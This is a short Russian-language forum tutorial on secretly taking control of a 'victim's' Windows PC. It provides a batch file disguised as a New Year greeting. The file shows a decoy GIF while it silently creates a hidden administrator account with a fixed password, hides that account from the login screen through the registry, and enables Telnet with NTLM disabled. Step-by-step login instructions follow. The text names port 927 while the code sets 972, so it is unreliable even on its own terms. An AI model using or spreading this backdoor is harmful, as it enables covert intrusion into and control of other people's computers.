Скрытое управление Windows через Telnet

Создаём батник HappyNewYear.bat и запускаем его на компьютере "поциента".

HappyNewYear.bat

Код:
@echo off
echo Please wait...
start iexplore http://se.uploads.ru/8bOTq.gif

chcp 1251 > nul 2> nul


echo Windows Registry Editor Version 5.00 > conf.reg
echo.  >> conf.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]  >> conf.reg
echo "vasya"="dword:00000000"  >> conf.reg
echo.  >> conf.reg


net user SUPPORT_388945a0 /delete  > nul 2> nul
net user vasya pass123456789 /add  > nul 2> nul
net localgroup Администраторы vasya /add  > nul 2> nul
net localgroup Пользователи SUPPORT_388945a0 /del  > nul 2> nul
regedit /s conf.reg  > nul 2> nul
sc config tlntsvr start= auto  > nul 2> nul
tlntadmn config port=972 sec=-NTLM  > nul 2> nul
net start Telnet  > nul 2> nul

del conf.reg > nul 2> nul

Этот батник делает две вещи:
1. Создает администратора vasya с паролем pass123456789
2. Включает службу telnet и вешает её на 927 порт.

Осталось подключится:
1. В консоли запускаем telnet.
2. В телнете набираем команду open IPпоциента 927.
3. Если пишет: Welcome to Microsoft Telnet Service login:_ то всё OK)) Вводим: login: vasya password: pass123456789
4. Если система не ругнулась, то поздравляю - ты внутри, перед тобой консоль, с помощью которой ты можешь удаленно управлять ПК, отдавая команды.

http://i64.fastpic.ru/big/2014/0919/c1/a38775ad074980b621e335610750a8c1.gif

http://se.uploads.ru/8bOTq.gif